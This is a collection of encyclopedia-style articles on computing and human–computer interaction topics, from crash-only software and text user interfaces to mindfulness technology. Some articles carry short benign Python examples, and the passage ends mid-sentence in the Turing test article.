Self-management is the process by which computer systems manage their own operation without human intervention. Self-management technologies are expected to pervade the next generation of network management systems.[citation needed] The growing complexity of modern networked computer systems is a limiting factor in their expansion. The increasing heterogeneity of corporate computer systems, the inclusion of mobile computing devices, and the combination of different networking technologies like WLAN, cellular phone networks, and mobile ad hoc networks make conventional, manual management difficult, time-consuming, and error-prone. More recently, self-management has been suggested as a solution to the increasing complexity of cloud computing.[1][2] An industrial initiative towards realizing self-management is the Autonomic Computing Initiative (ACI) started by IBM in 2001. The ACI defines four functional areas: self-configuration, self-healing, self-optimization, and self-protection.
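These areas are typically realized as a closed control loop in the spirit of IBM's monitor-analyze-plan-execute (MAPE-K) reference model. The following is a minimal, hypothetical sketch of such a self-healing loop; the service, failure model, and recovery policy are all illustrative, not part of the ACI specification.

```python
import random
import time

# Hypothetical names throughout; a toy monitor/analyze/plan/execute loop.

class ManagedService:
    """A toy resource whose health the autonomic manager watches."""
    def __init__(self):
        self.healthy = True

    def probe(self) -> bool:
        # Monitor: observe current state (failure is simulated at random here)
        self.healthy = random.random() > 0.2
        return self.healthy

    def restart(self):
        # Execute: apply the chosen recovery action
        self.healthy = True


def autonomic_loop(service: ManagedService, cycles: int = 5):
    for _ in range(cycles):
        ok = service.probe()            # Monitor
        needs_recovery = not ok         # Analyze: compare state against policy
        if needs_recovery:              # Plan: pick an action (restart)
            service.restart()           # Execute: self-heal, no operator involved
            print("fault detected; service restarted")
        else:
            print("service healthy")
        time.sleep(0.1)

autonomic_loop(ManagedService())
```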
https://en.wikipedia.org/wiki/Self-management_(computer_science)
Crash-only software is a computer program that handles failures by simply restarting, without attempting any sophisticated recovery.[1] Correctly written components of crash-only software can microreboot to a known-good state without the help of a user. Since failure-handling and normal startup use the same methods, this can increase the chance that bugs in failure-handling code will be noticed,[clarification needed] except when there are leftover artifacts, such as data corruption from a severe failure, that don't occur during normal startup.[citation needed] Crash-only software also has benefits for end-users. All too often, applications do not save their data and settings while running, only at the end of their use. For example, word processors usually save settings when they are closed. A crash-only application is designed to save all changed user settings soon after they are changed, so that the persistent state matches that of the running machine. No matter how an application terminates (be it a clean close or the sudden failure of a laptop battery), the state will persist.
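The design reduces to two rules: persist every state change immediately and atomically, and make normal startup the only recovery path. A minimal sketch under those assumptions (the file name and settings schema are hypothetical):

```python
import json
import os
import tempfile

SETTINGS_PATH = "settings.json"  # hypothetical persistent state file

def save_settings(settings: dict) -> None:
    """Persist immediately and atomically: write a temp file, fsync, then rename.
    A crash at any point leaves either the old file or the new one, never a torn write."""
    fd, tmp = tempfile.mkstemp(dir=".", prefix="settings.")
    try:
        with os.fdopen(fd, "w") as f:
            json.dump(settings, f)
            f.flush()
            os.fsync(f.fileno())
        os.replace(tmp, SETTINGS_PATH)  # atomic rename on POSIX and Windows
    except BaseException:
        os.unlink(tmp)
        raise

def load_settings() -> dict:
    """Startup and crash recovery are the same code path: read the last saved state."""
    try:
        with open(SETTINGS_PATH) as f:
            return json.load(f)
    except FileNotFoundError:
        return {}  # first run: known-good empty state

settings = load_settings()
settings["font_size"] = 14   # save as soon as the user changes something
save_settings(settings)
```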
https://en.wikipedia.org/wiki/Crash-only_software
Digital Live Art[1] is the intersection of Live Art, Computing and Human–Computer Interaction (HCI). It describes live performance that is computer-mediated: an orchestrated, temporal, witnessed event occurring for any length of time and in any place using technological means. Digital Live Art borrows methods, tools and theories from HCI to help inform and analyze the design and evaluation of Digital Live Art experiences.

Central to the understanding of Digital Live Art is the concept of performance framing. First identified by Gregory Bateson,[2] the performance frame is described as a cognitive context in which all the rules of behavior, symbols, and their interpretations are bound within a particular activity with its own structure. The concept has since been used extensively in ethnography by Erving Goffman in his discussions of face-to-face encounters in the everyday and in discourse structures;[3] in theatrical and ritual events;[4][5] in sporting events and festivals;[6] and in trance phenomena[7] (see:[8]). Goffman's work uses the concept of the performance frame to mean, broadly, a constructed context within the limits of which individual human agency and social interaction take place. For example, a theatrical frame ([9] pp. 124–155) involves the construction of a higher-level frame on top of a 'primary framework', i.e., the reality in which the fantasy takes place. In this example, actors assume a character, audiences suspend disbelief, and events have their meaning transformed (e.g., compare the use of a mobile phone in public with its use in a theatre). Additionally, framings are temporal, meaning that they have specific beginnings and endings. While many theorists argue that all social interaction may be seen from a dramaturgical perspective, meaning all everyday social interaction becomes performance in some sense,[9] Digital Live Art theorists often deliberately align their work with Richard Schechner,[10] narrowing their analysis to more stabilized 'established' forms of performance, so that performance framing is defined as an activity done within the intended frame 'by an individual or group' who have some established knowledge about the frame, and are 'in the presence of and for another individual or group'.[11] Performance framings, then, are intentional, temporal and for an audience.

The goal of interaction in Digital Live Art goes beyond that of traditional HCI methods and theory, which focus on usability, functionality and efficiency. HCI and CSCW models often focus on workplace activities and their tasks, artefacts and goals. This research often leads to a better understanding of how to increase efficiency in the workplace by providing more efficient and usable interfaces. For example, one could conduct usability testing or task analysis of how a DJ uses DJ decks, and then use this information to design a more efficient system. However, traditional HCI models tell us little about how the performer–audience relationship develops as a result of users' wittingness to interact with the system. The intention with Digital Live Art is not to make more "usable" systems but rather to allow for "participatory transitions"[1]: transitions between "witting and unwitting",[1] between observation and participation, and between participation and performance.
Since the goal with Digital Live Art systems is to "mediate wittingness"[1] rather than task-focused interaction, many HCI models, frameworks and methods are insufficient for analyzing and evaluating Digital Live Art. Sheridan first introduced the Performance Triad Model[12] for analyzing "tripartite interaction": interaction between observers, participants and performers. In the Performance Triad Model, technology binds tripartite interaction to context and environment. Reeves et al.[13] draw a distinction between a performer and a spectator and examine how their transitioning relationship is mediated by the interface. Dix and Sheridan[14] introduced a formal method for analyzing "performative interaction"[1] in Digital Live Art. This formal method provides a mathematical technique for deconstructing interaction between witting and unwitting bystanders and observers, participants in the performance, and the performers themselves. The work attempts to formalise some of the basic attributes of performative interaction against a background of sociological analysis in order to better understand how computer interfaces may support performance. It shows how this generic formalisation can be used in the deconstruction, analysis and understanding of performative action and, more broadly, of live performance.
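The published formalism is not reproduced here, but the role transitions it deconstructs can be illustrated with a toy state machine; every name below is illustrative rather than taken from Dix and Sheridan's method.

```python
from enum import Enum, auto

# Illustrative names only; a toy model of the tripartite role transitions
# described above, not the published formal method.

class Role(Enum):
    UNWITTING_BYSTANDER = auto()
    WITTING_OBSERVER = auto()
    PARTICIPANT = auto()
    PERFORMER = auto()

# Permitted "participatory transitions": becoming witting, then participating,
# then performing (and stepping back down again).
TRANSITIONS = {
    Role.UNWITTING_BYSTANDER: {Role.WITTING_OBSERVER},
    Role.WITTING_OBSERVER: {Role.PARTICIPANT, Role.UNWITTING_BYSTANDER},
    Role.PARTICIPANT: {Role.PERFORMER, Role.WITTING_OBSERVER},
    Role.PERFORMER: {Role.PARTICIPANT},
}

def step(current: Role, target: Role) -> Role:
    """Move to the target role only if the model permits the transition."""
    if target in TRANSITIONS[current]:
        return target
    raise ValueError(f"no direct transition {current.name} -> {target.name}")

role = Role.UNWITTING_BYSTANDER
for nxt in (Role.WITTING_OBSERVER, Role.PARTICIPANT, Role.PERFORMER):
    role = step(role, nxt)
    print(role.name)
```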
https://en.wikipedia.org/wiki/Digital_Live_Art
In computing, a text-based user interface (TUI) (alternately terminal user interface, to reflect a dependence upon the properties of computer terminals and not just text) is a retronym describing a type of user interface (UI) common as an early form of human–computer interaction, before the advent of bitmapped displays and modern conventional graphical user interfaces (GUIs). Like modern GUIs, they can use the entire screen area and may accept mouse and other inputs. They may also use color and often structure the display using box-drawing characters such as ┌ and ╣. The modern context of use is usually a terminal emulator. From a text application's point of view, a text screen (and communications with it) can belong to one of three types, in decreasing order of accessibility. Under Linux and other Unix-like systems, a program easily accommodates any of the three cases because the same interface (namely, standard streams) controls the display and keyboard. See below for comparison to Windows. Many TUI programming libraries are available to help developers build TUI applications. The American National Standards Institute (ANSI) standard ANSI X3.64 defines a standard set of escape sequences that can be used to drive terminals to create TUIs (see ANSI escape code). Escape sequences may be supported for all three cases mentioned above, allowing arbitrary cursor movements and color changes. However, not all terminals follow this standard, and many non-compatible but functionally equivalent sequences exist. On IBM Personal Computers and compatibles, the Basic Input Output System (BIOS) and DOS system calls provide a way to write text on the screen, and the ANSI.SYS driver could process standard ANSI escape sequences. However, programmers soon learned that writing data directly to the screen buffer was far faster, simpler to program, and less error-prone; see VGA-compatible text mode for details. This change in programming methods resulted in many DOS TUI programs. The Windows console environment is notorious for its emulation of certain EGA/VGA text mode features, particularly random access to the text buffer, even if the application runs in a window. On the other hand, programs running under Windows (both native and DOS applications) have much less control of the display and keyboard than Linux and DOS programs can have, because of the aforementioned Windows console layer. Most often those programs used a blue background for the main screen, with white or yellow characters, although they commonly also offered user color customization. They often used box-drawing characters in IBM's code page 437. Later, the interface became deeply influenced by graphical user interfaces (GUIs), adding pull-down menus, overlapping windows, dialog boxes and GUI widgets operated by mnemonics or keyboard shortcuts. Soon mouse input was added, either at text resolution as a simple colored box or at graphical resolution thanks to the ability of the Enhanced Graphics Adapter (EGA) and Video Graphics Array (VGA) display adapters to redefine the text character shapes by software, providing additional functions. Some notable programs of this kind were Microsoft Word, DOS Shell, WordPerfect, Norton Commander, the Turbo Vision-based Borland Turbo Pascal and Turbo C (the latter included the conio library), Lotus 1-2-3 and many others. Some of these interfaces survived even during the Microsoft Windows 3.1x period in the early 1990s. For example, the Microsoft C 6.0 compiler, used to write true GUI programs under 16-bit Windows, still has its own TUI.
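As noted above, ANSI X3.64 escape sequences are plain byte sequences written to the terminal. The short sketch below shows the common clear-screen, cursor-positioning and color codes; it assumes an ANSI-compatible terminal.

```python
import sys

# Minimal ANSI X3.64 escape-sequence demo; requires an ANSI-compatible terminal.
ESC = "\x1b["  # CSI: Control Sequence Introducer

def clear_screen():
    sys.stdout.write(ESC + "2J")             # ED: erase entire screen

def move_cursor(row: int, col: int):
    sys.stdout.write(f"{ESC}{row};{col}H")   # CUP: cursor position (1-based)

def color(text: str, fg: int) -> str:
    return f"{ESC}{fg}m{text}{ESC}0m"        # SGR: set color, then reset

clear_screen()
move_cursor(3, 10)
sys.stdout.write(color("Hello from a TUI", 31))  # 31 = red foreground
move_cursor(5, 1)
sys.stdout.flush()
```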
Since its start, Microsoft Windows has included a console to display DOS software. Later versions added the Windows console as a native interface for command-line interface and TUI programs. The console usually opens in window mode, but it can be switched to full, true text mode screen and vice versa by pressing the Alt and Enter keys together. Full-screen mode is not available in Windows Vista and later, but may be used with some workarounds.[1] Windows Terminal is a multi-tabbed terminal emulator that Microsoft has developed for Windows 10 and later[2] as a replacement for Windows Console. The Windows Subsystem for Linux, which Microsoft added to Windows in 2019, supports running Linux text-based apps on Windows, within Windows console, Windows Terminal, and other Windows-based terminals. In Unix-like operating systems, TUIs are often constructed using the terminal control library curses, or ncurses (a mostly compatible library), or the alternative S-Lang library. The advent of the curses library with Berkeley Unix created a portable and stable API with which to write TUIs. The ability to talk to various text terminal types using the same interfaces led to more widespread use of "visual" Unix programs, which occupied the entire terminal screen instead of using a simple line interface. This can be seen in text editors such as vi, mail clients such as pine or mutt, system management tools such as SMIT, SAM and FreeBSD's Sysinstall, and web browsers such as lynx. Some applications, such as w3m and older versions of pine and vi, use the less capable termcap library, performing many of the functions associated with curses within the application. Custom TUI applications based on widgets can be easily developed using the dialog program (based on ncurses) or the Whiptail program (based on S-Lang). In addition, the rise in popularity of Linux brought many former DOS users to a Unix-like platform, which has fostered a DOS influence in many TUIs. The program minicom, for example, is modeled after the popular DOS program Telix. Some other TUI programs, such as the Twin desktop, were ported over. Most Unix-like operating systems (Linux, FreeBSD, etc.) support virtual consoles, typically accessed through a Ctrl-Alt-F key combination. For example, under Linux up to 64 consoles may be accessed (12 via function keys), each displaying in full-screen text mode. The free software program GNU Screen provides for managing multiple sessions inside a single TUI, and so can be thought of as being like a window manager for text-mode and command-line interfaces. Tmux can also do this. The proprietary macOS text editor BBEdit includes a shell worksheet function that works as a full-screen shell window. The free Emacs text editor can run a shell inside one of its buffers to provide similar functionality. There are several shell implementations in Emacs, but only ansi-term is suitable for running TUI programs. The other common shell modes, shell and eshell, only emulate command lines, and TUI programs will complain "Terminal is not fully functional" or display a garbled interface. The free Vim and Neovim text editors have terminal windows (simulating xterm). The feature is intended for running jobs, parallel builds, or tests, but can also be used (with window splits and tab pages) as a lightweight terminal multiplexer. VAX/VMS (later known as OpenVMS) had a similar facility to curses known as the Screen Management facility, or SMG.
This could be invoked from the command line or called from programs using the SMG$ library.[3] Another kind of TUI is the primary interface of the Oberon operating system, first released in 1988 and still maintained. Unlike most other text-based user interfaces, Oberon does not use a text-mode console or terminal, but requires a large bit-mapped display, on which text is the primary target for mouse clicks. Analogous to a link in hypertext, a command has the format Module.Procedure parameters~ and is activated with a mouse middle-click. Text displayed anywhere on the screen can be edited, and if formatted with the required command syntax, can be middle-clicked and executed. Any text file containing suitably formatted commands can be used as a so-called tool text, thus serving as a user-configurable menu. Even the output of a previous command can be edited and used as a new command. This approach is radically different from both conventional dialogue-oriented console menus and command-line interfaces, but bears some similarities to the worksheet interface of the Macintosh Programmer's Workshop.[citation needed] Since it does not use graphical widgets, only plain text, yet offers comparable functionality to a GUI with a tiling window manager, it is referred to as a text user interface, or TUI. For a short introduction, see the second paragraph on page four of the first published Report on the Oberon System.[4] Oberon's UI influenced the design of the Acme text editor and email client for the Plan 9 from Bell Labs operating system. Modern embedded systems are capable of displaying a TUI on a monitor like personal computers. This functionality is usually implemented using specialized integrated circuits, modules, or FPGAs. Video circuits or modules are usually controlled using a VT100-compatible command set over UART,[citation needed] while FPGA designs usually allow direct video memory access.[citation needed]
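On Unix-like systems, the curses family mentioned above is the usual route. A minimal full-screen sketch using Python's standard curses binding (available on Unix-like systems):

```python
import curses

# Minimal full-screen TUI using Python's standard curses binding.
def main(stdscr):
    curses.curs_set(0)                  # hide the cursor
    stdscr.clear()
    stdscr.border()                     # draw a frame with line-drawing characters
    stdscr.addstr(1, 2, "A tiny full-screen TUI. Press q to quit.")
    while True:
        if stdscr.getch() == ord("q"):  # block until a key, exit on 'q'
            break

curses.wrapper(main)                    # sets up and safely restores the terminal
```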
https://en.wikipedia.org/wiki/Text-based_user_interface
The HCI Bibliography is a web-based project to provide a bibliography of Human–Computer Interaction (HCI) literature. The goal of the project is to put an electronic bibliography for most of HCI on the screens of all researchers, developers, educators and students in the field through the World-Wide Web and anonymous ftp access. The HCI Bibliography Project is an effort aimed at giving information seekers free access to bibliographic information in the field of HCI. It is a database, accessible from anywhere in the world. The project was conceived by Gary Perlman (director of the HCI Bibliography project) in 1998. Initially, the project struggled to find funding and sponsors, but work-study students at Ohio State University were available to enter the bibliographic data into the database, and volunteers from the internet helped verify the data. Donations from publishers also played a role in building the database. Although funding and sponsorship were scarce at the beginning of the project, publishers gave the HCI Bibliography team permission to put their materials online free of charge.[1] As of September 2024, the site is no longer accepting updates, a policy that appears to have been established in 2016. In 2007, the HCI Bibliography group acknowledged several publishers for their support of the project. Project support included publishers granting copyright permission and donating publications to be entered into the HCI Bibliography database.[2] As of July 2009, the HCI Bibliography had over 50,000 entries.[3] These entries are made up of journal volumes, conference proceedings, books and some special files.
https://en.wikipedia.org/wiki/HCI_Bibliography
Information architecture (IA) is the structural design of shared information environments; the art and science of organizing and labelling websites, intranets, online communities and software to support usability and findability; and an emerging community of practice focused on bringing principles of design, architecture and information science to the digital landscape.[1] Typically, it involves a model or concept of information that is used and applied to activities which require explicit details of complex information systems. These activities include library systems and database development. Information architecture has somewhat different meanings in different branches of information systems and information technology. The difficulty in establishing a common definition for "information architecture" arises partly from the term's existence in multiple fields. In the field of systems design, for example, information architecture is a component of enterprise architecture that deals with the information component when describing the structure of an enterprise. While the definition of information architecture is relatively well established in the field of systems design, it is much more debatable within the context of online information (i.e., websites). Andrew Dillon refers to the latter as the "big IA–little IA debate".[7] In the little IA view, information architecture is essentially the application of information science to web design, considering, for example, issues of classification and information retrieval. In the big IA view, information architecture involves more than just the organization of a website; it also factors in user experience, thereby considering usability issues of information design.
https://en.wikipedia.org/wiki/Information_architecture
Information design is the practice of presenting information in a way that fosters an efficient and effective understanding of the information. The term has come to be used for a specific area of graphic design related to displaying information effectively, rather than just attractively or for artistic expression. Information design is closely related to the field of data visualization and is often taught as part of graphic design courses.[1] The broad applications of information design, along with its close connections to other fields of design and communication practice, have created some overlap in the definitions of communication design, data visualization, and information architecture. According to Per Mollerup, information design is explanation design. It explains facts of the universe and leads to knowledge and informed action.[2] The term 'information design' emerged as a multidisciplinary area of study in the 1970s. Use of the term is said to have started with graphic designers, and it was solidified with the publication of the Information Design Journal in 1979. The related International Institute for Information Design (IIID) was set up in 1987, and the Information Design Association (IDA) was established in 1991.[3] In 1982, Edward Tufte produced a book on information design called The Visual Display of Quantitative Information. The term information graphics tends to be used by those primarily concerned with diagramming and the display of quantitative information, such as technical communicators and graphic designers. In technical communication, information design refers to creating an information structure for a set of information aimed at specified audiences. It can be practised on different scales. There are many similarities between information design and information architecture. The title of information designer is sometimes used by graphic designers who specialize in creating websites. The skillset of the information designer, as the title is applied more globally, is closer to that of the information architect in the U.S. Similar skills for organization and structure are brought to bear in designing websites and digital media, with additional constraints and functions that earn a designer the title of information architect. In computer science and information technology, 'information design' is sometimes a rough synonym for (but is not necessarily the same discipline as) information architecture, the design of information systems, databases, or data structures. This sense includes data modeling and process analysis. Information design is associated with the age of technology but has historical roots. Among the effective early instances of modern information design is Minard's diagram, which shows the losses suffered by Napoleon's army in the 1812–1813 period. Six variables are plotted: the size of the army, its location on a two-dimensional surface (x and y), time, direction of movement, and temperature. This multivariate display on a two-dimensional surface tells a story that can be grasped immediately while identifying the source data to build credibility. Edward Tufte wrote in 1983 that: "It may well be the best statistical graphic ever drawn."[5] Information design can be used for broad audiences (such as signs in airports) or specific audiences (such as personalized telephone bills).[11] The resulting work often seeks to improve a user's trust of a product (such as medicine packaging inserts, operational instructions for industrial machinery and information for emergencies).
The example of signs also highlights a niche category known as wayfinding. Governments and regulatory authorities have legislated on a number of information design issues, such as the minimum size of type in financial small print, the labelling of ingredients in processed food, and the testing of medicine labelling. Examples of this are the Truth in Lending Act in the USA, which introduced the Schumer box (a concise summary of charges for people applying for a credit card), and the Guideline on the Readability of the Labelling and Package Leaflet of Medicinal Products for Human Use (European Commission, Revision 1, 12 January 2009). Professor Edward Tufte explained that users of information displays are executing particular analytical tasks, such as making comparisons or determining causality. The design principle of the information graphic should support the analytical task, showing the comparison or causality.[12] Simplicity is a major concern in information design. The aim is clarity and understanding. Simplification of messages may imply quantitative reduction but is not restricted to that. Sometimes more information means more clarity. Also, simplicity is a highly subjective matter and should always be evaluated with the information user in mind. Simplicity can be achieved by following five simple steps of information design; these steps help an information designer narrow down results, as well as keep their audience engaged.[13]
https://en.wikipedia.org/wiki/Information_design
Mindfulness and technology is a movement in research and design that encourages the user to become aware of the present moment, rather than losing oneself in a technological device. This field encompasses multidisciplinary participation between design, psychology, computer science, and religion. Mindfulness stems from Buddhist meditation practices and refers to the awareness that arises through paying attention on purpose in the present moment, and in a non-judgmental mindset. In the field of Human–Computer Interaction, research is being done on techno-spirituality, the study of how technology can facilitate feelings of awe, wonder, transcendence, and mindfulness,[1] and on slow design,[2][3] which facilitates self-reflection. The excessive use of personal devices, such as smartphones and laptops, can lead to the deterioration of mental and physical health.[4] This area focuses on redesigning and creating technology to improve the wellbeing of its users. In 1979, Jon Kabat-Zinn founded the Mindfulness-Based Stress Reduction (MBSR) program at the University of Massachusetts to treat the chronically ill.[5] He is noted[by whom?] to be responsible for the popularization of mindfulness in Western culture. The program uses a combination of mindfulness meditation, body awareness, and yoga. These practices derive from teachings of the Eastern world, specifically Buddhist traditions. Researchers found that enhanced mindfulness through the program partly mediated the association[which?] between increased daily spiritual experiences and improved mental-health-related quality of life.[6][need quotation to verify] Early studies of mindfulness focused on health issues related to psychosomatic and psychiatric disorders,[7] while later studies explored the business sector, showing an increase in creativity and a decrease in burnout.[8] Studies on the relationship between mindfulness and technology are fairly new, with some of the more recent research highlighting the importance the practice plays in safety.[8] Neurofeedback, also known as EEG biofeedback, is a non-invasive technique that uses real-time displays of brain activity to teach self-regulation of brain function. It involves placing sensors on the scalp to monitor brainwave patterns, which are then displayed on a computer screen. This real-time feedback facilitates operant conditioning, enhancing mindfulness and meditation practices. Research has shown that combining neurofeedback with mindfulness practices can significantly enhance the benefits of both approaches. Neurofeedback helps individuals maintain optimal brainwave patterns during mindfulness exercises, improving their ability to achieve and sustain a state of non-judgmental awareness. This combination has been associated with improved emotional regulation, reduced stress, and better cognitive function.[9] Studies have also investigated the use of neurofeedback-augmented mindfulness training (NAMT) in clinical settings. For instance, a randomized controlled trial is examining the effectiveness of real-time fMRI neurofeedback combined with mindfulness practice for adolescents with major depressive disorder (MDD). This study aims to determine the optimal duration and dosing of these interventions to maximize their therapeutic effects.[10] Various desktop and mobile applications aid users in practicing mindfulness, including Calm, Headspace, Insight Timer, Buddhify, and Yours App. Research supports the efficacy of these applications.
A randomized controlled trial demonstrated that using a mindfulness meditation app can alleviate acute stress and improve mood, potentially offering long-term benefits for attentional control.[11] Additionally, studies have shown that meditation can change brain activity and reduce emotional reactivity. A 2012 study published in Frontiers in Human Neuroscience found that mindful attention training can down-regulate emotional reactivity, with changes in brain activity persisting in everyday life, not just during meditation.[12] Furthermore, a 2011 brain imaging study published in the Journal of Neuroscience found that even brief mindfulness meditation instruction (four 20-minute sessions) effectively relieved pain by reducing the brain's emotional response to painful stimuli.[13] To help make meditation and mindfulness more accessible, developers have created digital health platforms such as Am Mindfulness, Headspace, Insight Timer, and Buddhify. Notably, Am Mindfulness is the only commercially available meditation app that has outperformed placebos in randomized controlled trials.[11] According to Vietnamese Zen teacher Thich Nhat Hanh, the ringing of a bell every 15 minutes[14] is an effective way to cultivate the mindfulness practice and connect back with the body. The Mindfulness Bell and Mindful Mynah applications simulate the bell on the user's personal device. There are several wearables which measure the breath in order to connect the user back to their body. Wo.Defy is a dress which attempts to reveal the beauty of emotional communication using the common platform of the human breath, proposing that the best methods of human-to-human communication lie within us.[15] Spire measures the wearer's breathing patterns to give insights into their state of mind.[16] Being, the mindfulness tracker from Zensorium, maps the user's emotions (stressed, excited, normal and calm) through heart rate variability.[17] WellBe monitors heart rate levels and then matches them, through a patent-pending algorithm, to specific moments and interactions throughout a user's day.[17] SmartMat is a responsive mat embedded with 21,000 sensors to detect the body's balance, pressure and alignment.[17] Prana's platform evaluates breath patterns, takes into account the effects of posture on breathing, and differentiates between diaphragmatic and chest breathing, three critical components of assessing the true quality of breathing previously unaddressed by systems such as spirometers or pulse oximeters.[18] Sonic Cradle enables users to shape sound with their breath while suspended in a completely dark chamber.[19] The researchers conducted a qualitative study with 39 participants to show how persuasive media has the potential to promote long-term psychological health by experientially introducing a stress-relieving, contemplative practice to non-practitioners.[19] Because the nature of chronic pain is complex, pharmacological analgesics are often not enough to achieve an ideal treatment plan. One system, titled the "Virtual Meditative Walk" (VMW), incorporates biofeedback sensors, an immersive virtual environment, and stereoscopic sound. It was designed to enable chronic pain patients to learn mindfulness-based stress reduction (MBSR), a form of meditation.
By providing real-time visual and sonic feedback, VMW enables patients to learn how to manage their pain.[20] Intel anthropologist Genevieve Bell has urged the human–computer interaction (HCI) research community to devote more research to the use of technology in spirituality and religion. Techno-spirituality is the study of how technology can facilitate feelings of awe, wonder, transcendence, and mindfulness.[1] Currently, there are 6,000 applications related to spirituality and religion. The area is in high demand and is among the "important under-explored areas of HCI research".[21] Inspired by Bell's work, researchers (Sterling & Zimmerman) focused on how mobile phones could be incorporated into an American Soto Zen Buddhist community without conflicting with its philosophy of "the here and the now". They were able to find three ways to use technology to help strengthen ties within the community.[22] Slow design is a design agenda for technology aimed at reflection and moments of mental rest rather than efficiency in performance.[2] Mindful design, based on Langer's theory of mindfulness,[23][24] is a design philosophy that incorporates the idea of mindfulness into creating meaningful, user-oriented design. A major tenet is behavior change of the user through awareness of, and responsibility for, meaningful interactions between user and designed object, which will encourage more desirable human practices.[25] This type of mind-and-behavior-driven change has been most heavily incorporated into design for sustainability. Other approaches include crime prevention and health. It is also seen in the design of safety objects and the social interaction of performative objects. Performative objects are design objects intended to facilitate mindful awareness of the physical and symbolic social actions, and their consequences, within which they are used.[26] Several major tech companies in Silicon Valley have incorporated mindfulness practices into their workplace culture. For example, Google offers bimonthly "mindfulness lunches" and has constructed a labyrinth for walking meditations. Similarly, Twitter and Facebook have integrated contemplative practices into their employee programs. These initiatives aim to enhance communication and develop the emotional intelligence of employees.[27] Mindfulness is currently being explored by researchers as a possible treatment for technological addiction, also known as Internet addiction disorder, a form of behavioral addiction. There has been some consensus in the field of psychology on the benefits of using mindfulness to treat behavioral addiction.[28] Experts in the field say that to treat technology addiction with mindfulness, one must be non-judgmental about the behavior and pay attention in order to recognize instances in which technology is being used mindlessly, then reflect on the helpfulness of the device and notice the benefits of disconnecting.[29] The three keystones of mindfulness are intention, attention and action.[29] Technology is said to interfere with mindfulness by causing the individual to forget what matters (intention), by distracting (attention), and by keeping the individual from taking action (action).[29] In technological addiction, the reward system, located in the mid-brain, underlies addiction; it evolved to reward finding and consuming food. In complex animals this evolution also rewards the exchange of information within the social group.
In humans this has developed into its current form of mass worldwide communication.[30] The exchange of social information has demonstrated reward-based reinforcement, similar to that of gamification.[30] Critics argue that mindfulness in technology can lead to technophobia, pacification of workplace grievances, and disconnection from religious roots. Some view the movement as a marketing tactic rather than a genuine solution to technological overuse. Others are concerned about the secularization of mindfulness, fearing it may dilute its traditional Buddhist values. Mobile meditation applications like Calm, Headspace and MyLife have over a million users and are increasing in popularity. Swedish researchers found that downloading and using the applications for eight weeks made little to no difference for people with major depression and anxiety. They did, however, see improvements in a subgroup with mild levels of depression.[31] Mindfulness apps are also associated with a range of challenges to engagement.[32] Criticisms of the slow technology movement resemble those of the slow-food movement: it lacks understanding of the problem's global scope, and as an individualistic response it will not answer the actual problems in technology. The movement has been dubbed by critics as "disconnectionist".[33] Mindfulness in technology has been criticized as being less about restoring the self and more about stifling the autonomy that technology inspires. Anti-disconnectionists state that mindfulness and the expressed need to disconnect from technology and the modern world can be accused of being a nostalgia-manipulating marketing tactic and perhaps a technological form of conservatism. Critics state that the labeling of digital connection as debasing and unnatural is in direct proportion to the rapidity of its adoption,[33][34] and that connection is thus depicted as a dangerous desire and a toxin to be regulated. This argument can be tied back to rationalization, Walter Benjamin on aura, Jacques Ellul on technique, Jean Baudrillard on simulations, or Zygmunt Bauman and the Frankfurt School on modernity and the Enlightenment. Critics state that disconnectionists see the Internet as having normalized or enforced a repression of an authentic self in favor of a social media avatar,[33] reflecting a desire to connect with a deeper self which may itself be an illusion. The pathologization of technology use then opens the door for Foucault's idea of "normalization" to be applied to technology in a similar fashion as other social ills, around which social control and management can then be applied. There is some concern among Buddhist practitioners that decoupling meditation and mindfulness from the core tenets of Buddhism may have negative effects. The wide adoption of mindfulness in technology and the tech industry has been accused of increasing passivity in the worker by creating a calm state of mind which then allows for disconnection from actual grievances.[35] Critics of mindfulness in Cognitive Behavior Therapy also comment on this as a possible problem.[33] Critics of the movement, such as Ronald Purser, fear that the secularization of mindfulness, dubbed McMindfulness,[36] leads to the reinforcement of anti-Buddhist ideas. Buddhists differentiate between Right Mindfulness (samma sati) and Wrong Mindfulness (miccha sati).
The distinction is not moralistic: the issue is whether the quality of awareness is characterized by wholesome intentions and positive mental qualities that lead to human flourishing and optimal well-being for others as well as oneself. Mindfulness as adopted by the Silicon Valley tech giants has been criticized as conveniently shifting the burden of stress and a toxic work environment onto the individual employee. Obscured by the seemingly inherent qualities of care and humanity, mindfulness is refashioned into a way of coping with and adapting to the stresses and strains of corporate life rather than actually resolving them.[36]
https://en.wikipedia.org/wiki/Mindfulness_and_technology
The following outline is provided as an overview of and topical guide to human–computer interaction:

Human–Computer Interaction (HCI): the intersection of computer science and the behavioral sciences, this field involves the study, planning, and design of the interaction between people (users) and computers. Attention to human-machine interaction is important because poorly designed human-machine interfaces can lead to many unexpected problems. A classic example of this is the Three Mile Island accident, where investigations concluded that the design of the human-machine interface was at least partially responsible for the disaster.

Human–Computer Interaction can be described as all of the following:
Human–computer interaction draws from the following fields:
History of human–computer interaction
Hardware input/output devices and peripherals:
Motion pictures featuring interesting user interfaces:
Industrial labs and companies known for innovation and research in HCI:
https://en.wikipedia.org/wiki/Outline_of_human%E2%80%93computer_interaction
The Turing test, originally called the imitation game by Alan Turing in 1949,[2] is a test of a machine's ability to exhibit intelligent behaviour equivalent to that of a human. In the test, a human evaluator judges a text transcript of a natural-language conversation between a human and a machine. The evaluator tries to identify the machine, and the machine passes if the evaluator cannot reliably tell them apart. The results would not depend on the machine's ability to answer questions correctly, only on how closely its answers resembled those of a human. Since the Turing test is a test of indistinguishability in performance capacity, the verbal version generalizes naturally to all of human performance capacity, verbal as well as nonverbal (robotic).[3] The test was introduced by Turing in his 1950 paper "Computing Machinery and Intelligence" while working at the University of Manchester.[4] It opens with the words: "I propose to consider the question, 'Can machines think?'" Because "thinking" is difficult to define, Turing chooses to "replace the question by another, which is closely related to it and is expressed in relatively unambiguous words".[5] Turing describes the new form of the problem in terms of a three-person party game called the "imitation game", in which an interrogator asks questions of a man and a woman in another room in order to determine the correct sex of the two players. Turing's new question is: "Are there imaginable digital computers which would do well in the imitation game?"[2] This question, Turing believed, was one that could actually be answered. In the remainder of the paper, he argued against the major objections to the proposition that "machines can think".[6] Since Turing introduced his test, it has been highly influential in the philosophy of artificial intelligence, resulting in substantial discussion and controversy, as well as criticism from philosophers like John Searle, who argue against the test's ability to detect consciousness.[7][8] Since the mid-2020s, several large language models such as ChatGPT have passed modern, rigorous variants of the Turing test.[9][10][11] Several early symbolic AI programs were controversially claimed to pass the Turing test, either by limiting themselves to scripted situations or by presenting "excuses" for poor reasoning and conversational abilities, such as mental illness or a poor grasp of English.[12][13][14] In 1966, Joseph 